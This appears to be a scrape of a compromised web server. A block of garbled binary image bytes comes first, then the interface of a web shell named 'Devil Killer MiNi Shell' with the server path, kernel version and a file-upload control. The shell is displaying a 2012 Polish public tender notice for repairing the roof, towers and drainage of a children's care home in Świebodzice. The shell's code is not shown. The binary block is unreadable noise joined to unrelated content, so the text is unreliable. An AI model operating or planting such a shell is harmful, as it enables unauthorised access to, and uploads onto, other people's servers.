JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120530/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120530/178924-N-2012.html

<p class="kh_header"><b>Świebodzice: Wykonanie robót budowlanych dotyczących zadania pn.: Remont dachu i wież na budynku Domu Pomocy Społecznej dla Dzieci w Świebodzicach, wykonanie izolacji przeciwwilgociowej murów fundamentowych wraz z drenażem  i przebudową kanalizacji deszczowo-sanitarnej</b><br>
<b>Numer ogłoszenia: 178924 - 2012; data zamieszczenia: 30.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej dla Dzieci , ul. Mickiewicza 8, 58-160 Świebodzice, woj. dolnośląskie, tel. 074 8540313, faks 8540313 w. 35.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ssnd.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Dom Pomocy Społecznej dla Dzieci.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie robót budowlanych dotyczących zadania pn.: Remont dachu i wież na budynku Domu Pomocy Społecznej dla Dzieci w Świebodzicach, wykonanie izolacji przeciwwilgociowej murów fundamentowych wraz z drenażem  i przebudową kanalizacji deszczowo-sanitarnej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3. OPIS PRZEDMIOTU ZAMÓWIENIA
3.1. Lokalizacja
Dom Pomocy Społecznej dla Dzieci w Świebodzicach, XIX w. Pałac Zabytkowy, usytuowany jest na działkach budowlanych nr 529/4, 537, obr. 3, AM 9 pod adresem ul. Mickiewicza 8 58-160 Świebodzice. Obiekt jest własnością Zgromadzenia Sióstr Szkolnych de Notre Dame Prowincja Polska z siedzibą w Opolu przy ul. Mały Rynek 5.
Obiekt wpisany jest do rejestru zabytków województwa dolnośląskiego - Decyzja Dolnośląskiego Wojewódzkiego Konserwatora Zabytków we Wrocławiu L.dz. WRiD-MJ-6000-33/09, nr rejestru: A/1377.
3.2. Opis przedmiotu zamówienia
Na przedmiot zamówienia składa się realizacja dwóch podzadań stanowiących roboty budowlane w ramach zadania głównego pn.: Remont dachu i wież na budynku Domu Pomocy Społecznej dla Dzieci w Świebodzicach, wykonanie izolacji przeciwwilgociowej murów fundamentowych wraz z drenażem i przebudową kanalizacji deszczowo-sanitarnej tj.:
Podzadanie nr 1:
Przebudowa przyłącza kanalizacji deszczowo-sanitarnej, odprowadzenie wód gruntowych w systemie drenażu opaskowego oraz wykonanie izolacji przeciwwilgociowej murów fundamentowych budynku Domu Pomocy Społecznej dla Dzieci w Świebodzicach (XIX w. Pałac Zabytkowy) tj. między innymi:
a) kanalizacja sanitarna:
- przepinka istniejącej ks160 z nowoprojektowanej studzienki Sk1 do istniejącej murowanej studzienki S ist. (patrz PB rys. 1),
- roboty przygotowawcze,
- roboty ziemne,
- montaż na istniejącym kolektorze ks160 betonowej studzienki rewizyjnej Sk1 (patrz PB rys. 1) o DN 1200 i zaślepienie istniejącej odnogi ks (dopuszcza się montaż studzienki z tworzywa sztucznego),
- budowa kanałów z rur PVC o DN 160,
- roboty montażowe obiektów inżynierskich tj. studzienek kanalizacyjnych z tworzywa sztucznego o DN 425 oraz DN 1200 betonowej lub z tworzywa, właz typ B125 włączenie do istniejącej studzienki,
- remont istniejącej, murowanej studzienki rewizyjnej, odbudowa kinety oraz tynkowanie ścian,
- odtworzenie nawierzchni, roboty wykończeniowe i uporządkowanie terenu, (wywóz gruzu)
b) kanalizacja deszczowa:
- przepinka ist, kd (studzienka Dist. 1 do istniejącej studzienki kd w ul. Browarowej) - patrz PB rys. 1,
- roboty przygotowawcze,
- roboty ziemne,
- przebudowa istniejącej kinety i wykonanie zaślepki zgodnie z dokumentacją, uzupełnienie ewentualnych ubytków w ściankach studzienki,
- budowa kanałów z rur PVC o DN 300,
- roboty montażowe obiektów inżynierskich tj. studzienki kanalizacyjnej DN 1200 z tworzywa sztucznego lub betonu),
- włączenie do istniejącej studzienki metodą bezwykopową,
- odtworzenie nawierzchni, roboty wykończeniowe i uporządkowanie terenu. (wywóz gruzu)
Kody CPV:
45.11.12.00-0 Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne
45.23.32.00-1 Roboty w zakresie różnych nawierzchni 
45.11.12.20-6 Roboty w zakresie usuwania gruzu
45.45.00.00-6 Roboty budowlane wykończeniowe, pozostałe
45.23.24.51-8 Roboty odwadniające i nawierzchniowe
45.11.12.40-2 Roboty w zakresie odwadniania gruntu
45.23.24.10-9 Roboty w zakresie kanalizacji ściekowej

Pozwolenie na budowę: Decyzja Starosty Świdnickiego Nr 1339/2011 z dnia 28 listopada 2011 r., znak: WB.6740.1401.2011-1.

Podzadanie nr 2
Remont dachu i wież na budynku istniejącego Domu Pomocy Społecznej Dla Dzieci w Świebodzicach wraz z remontem części elewacji tj. między innymi:
- zerwanie istniejących warstw papy,
- zerwanie + uzupełnienie uszkodzonego podkładu betonowego,
- gruntowanie podkładu środkiem np. siplast primer Icopal,
- przyklejenie papy podkładowej zgrzewalnej paroizolacyjnej AL,
- docieplenie połaci dachu wełną mineralną gr. 15 cm np. Dachrock-Max,
- pokrycie dachu papą termozgrzewalną modyfikowaną SBS dwuwarstwowe - mocowanie mechaniczne,
- podwyższenie podstawy wyłazu  wraz z obróbkami, pokrycie i docieplenie wyłazu
- demontaż starych i montaż nowych obróbek blacharskich z blachy tytan-cynk  
- demontaż starych i montaż nowych rynien i rur spustowych z blachy tytan-cynk
- demontaż starych i montaż nowych podokienników z blachy tytan-cynk
- skucie i wykonanie nowych tynków z zaprawy z dodatkiem włókien stabilizujących, malowanie nowych tynków farbą kryjącą mikropęknięcia np. KEIM,
- czyszczenie, renowacja i  impregnacja elementów kamiennych.
- przemurowanie wieżyczek
Kody CPV:
45.10.00.00-8 Przygotowanie terenu pod budowę
45.11.13.00-1 Roboty rozbiórkowe
45.26.00.00-7 Roboty w zakresie wykonywania pokryć i konstrukcji dachowych i inne podobne roboty specjalistyczne
45.26.23.11-4 Betonowanie konstrukcji
45.26.12.10-9 Wykonywanie pokryć dachowych
45.26.25.20-2 Roboty murowe
45.40.00.00-1 Roboty wykończeniowe w zakresie obiektów budowlanych
45.32.00.00-6 Roboty izolacyjne
45.41.00.00-4 Tynkowanie
45.44.21.00-8 Roboty malarskie
45.42.11.00-5 Instalowanie drzwi i okien, i podobnych elementów
45.26.25.10-9 Roboty kamieniarskie
45.45.30.00-7 Roboty remontowe i renowacyjne
45.26.13.00-7 Kładzenie zaprawy i rynien
Pozwolenie na budowę: Decyzja Starosty Świdnickiego Nr 1253/2006 z dnia 10 listopada 2006 r., znak: WB.7351-144/2/06/SD, Decyzja Starosty Świdnickiego Nr 1338/2007 z dnia 30 listopada 2007 r., znak: WB.7351-1241/07-3, Decyzja Starosty Świdnickiego Nr 207/2011 o zmianie pozwolenia na budowę, znak:WB.6740.200.2011.
3.3. Informacje dodatkowe
Przedmiot zamówienia szczegółowo został opisany w następujących dokumentach:
- Projekt Budowlany branża sanitarna - przebudowa przyłącza kanalizacji deszczowo-sanitarnej, odprowadzenie wód gruntowych w systemie drenażu opaskowego oraz wykonanie izolacji przeciwwilgociowej murów fundamentowych budynku Pomocy Społecznej dla Dzieci w Świebodzicach (XIX w. Pałac Zabytkowy) - dz. nr 529/4, 537 obr. 3, AM 9,
- Specyfikacja techniczna SST-01, SST-02 wykonania i odbioru robót branża sanitarna - przebudowa przyłącza kanalizacji deszczowo-sanitarnej, odprowadzenie wód gruntowych w systemie drenażu opaskowego oraz wykonanie izolacji przeciwwilgociowej murów fundamentowych budynku Pomocy Społecznej dla Dzieci w Świebodzicach (XIX w. Pałac Zabytkowy) - dz. nr 529/4, 537 obr. 3, AM 9,
- Projekt Budowlany zamienny remontu dachu na budynku istniejącego Domu Pomocy Społecznej wraz z projektem remontu elewacji - dz. nr 529/4 obr. 3,
- Specyfikacja techniczna wykonania i odbioru robót budowlanych remontu dachu na budynku istniejącego Domu Pomocy Społecznej wraz z remontem elewacji

Projekty,  Specyfikacje techniczne wykonania i odbioru robót stanowią załącznik do niniejszej specyfikacji i wraz z przedmiarami robót znajdują się na stronie internetowej Zamawiającego www.ssnd.pl. Dokumentacja projektowa znajduje się do wglądu w siedzibie Zamawiającego.
Przedmiary robót stanowią wyłącznie materiał pomocniczy dla wskazania technologii, która rzutuje na wysokość ceny Wykonawcy.
PRZED ZŁOŻENIEM OFERTY ZALECA SIĘ ZAINTERESOWANYM WYKONAWCOM DOKONANIE WIZJI LOKALNEJ TERENU OBIĘTEGO ZAKRESEM ROBÓT

UWAGA!
Wykonawca zobowiązany jest do przestrzegania przepisów BHP dla czynnego Domu Pomocy Społecznej dla Dzieci. 
Obiekt w trakcie realizacji zadania będzie całodobowo użytkowany między innymi  przez osoby niepełnosprawne..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza udzielenie zamówień uzupełniających, o którym mowa w art. 67 ust. 1 pkt. 1) a), pkt. 5) i pkt. 6) ustawy.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.00-0, 45.23.32.00-1, 45.11.12.20-6, 45.45.00.00-6, 45.23.24.51-8, 45.11.12.40-2, 45.23.24.10-9, 45.10.00.00-8, 45.11.13.00-1, 45.26.23.11-4, 45.26.00.00-7, 45.26.12.10-9, 45.26.25.20-2, 45.40.00.00-1, 45.32.00.00-6, 45.41.00.00-4, 45.44.21.00-8, 45.42.11.00-5, 45.26.25.10-9, 45.45.30.00-7, 45.26.13.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium w wysokości  15 000 zł.
Wykonawca wnosi wadium w jednej lub w kilku następujących formach:
- w pieniądzu,
- poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
- gwarancjach bankowych,
- gwarancjach ubezpieczeniowych,
- poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późniejszymi zmianami).
Wadium wniesione w pieniądzu należy wpłacić przelewem na rachunek bankowy zamawiającego: 60 1090 2356 0000 0001 1912 7000
Wadium winno być na koncie Zamawiającego nie później niż przed upływem terminu składania ofert.
W przypadku złożenia wadium w formie gwarancji, poręczeń, oryginał dokumentu należy złożyć nie później niż przed upływem terminu składania ofert w kasie zamawiającego. Jeśli Wykonawca prześle ofertę pocztą winien oryginał umieścić w oznaczonej kopercie oryginał dowodu wniesienia wadium.
Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem ust. 4a art. 46 ustawy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy mogą udokumentować wykonanie minimum 2 robót budowlanych, na kwotę co najmniej 500 000 zł netto każda, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, polegających na budowie lub remoncie w skład którego wchodził remont dachu, budynków szkolnych lub użyteczności publicznej</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W realizacji zadania będą brały udział osoby (dopuszcza się łączenie stanowisk) posiadające uprawnienia budowlane do kierowania robotami budowlanymi w specjalnościach: 
a) kierownik budowy posiadający uprawnienia budowlane w specjalności konstrukcyjno-budowlanej bez ograniczeń do kierowania robotami budowlanymi z co najmniej 5-letnim stażem pracy od uzyskania uprawnień oraz co najmniej 2 letnią praktyką zawodową na budowie przy zabytkach nieruchomych, wykształcenie wyższe techniczne
b) kierownik robót posiadający uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci sanitarnych z co najmniej 3-letnim stażem pracy od uzyskania uprawnień.
wraz z informacją na temat kwalifikacji zawodowych, doświadczeniu i wykształceniu tych osób niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz podstawę do dysponowania tymi osobami.

Wykonawcy wykażą, iż średnio roczne zatrudnienie za okres ostatnich trzech lat wynosiło nie mniej niż 20 pracowników</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy wykażą się przychodem netto ze sprzedaży (obrotem) za ostatnie 3 lata obrotowe (obrachunkowe) na poziomie co najmniej 3 000 000 zł za każdy rok, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres.
Wykonawcy posiadają środki finansowe w wysokości co najmniej 1 000 000 zł lub posiadają zdolność kredytową na ww. kwotę,
Wykonawcy posiadają ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności, na sumę nie mniejszą niż 500 000 złotych</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">oświadczenie na temat wielkości średniego rocznego zatrudnienia u wykonawcy usług lub robót budowlanych oraz liczebności personelu kierowniczego w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">sprawozdanie finansowe w części, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego inny dokument określający obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 3 lata obrotowe</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. pełnomocnictwo do działania w imieniu Wykonawcy w przypadku, gdy nie jest to osoba upoważniona do reprezentowania Wykonawcy z mocy prawa,
2. parafowany projekt umowy,
3. dowód wniesienia wadium,
4. pisemne zobowiązanie innych podmiotów do oddania do dyspozycji Wykonawcy zasobów niezbędnych do wykonania zamówienia, pisemne zobowiązanie winno być sporządzone w formie oświadczenia woli i zawierać w swej treści rodzaj i ilość oddanych do dyspozycji zasobów, formę ich przekazania, okres przekazania oraz wskazywać charakter stosunku prawnego łączącego Wykonawcę z tymi podmiotami,
5. wykaz części zamówienia, której wykonanie Wykonawca powierzy podwykonawcom, według Załącznika nr 7 do SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


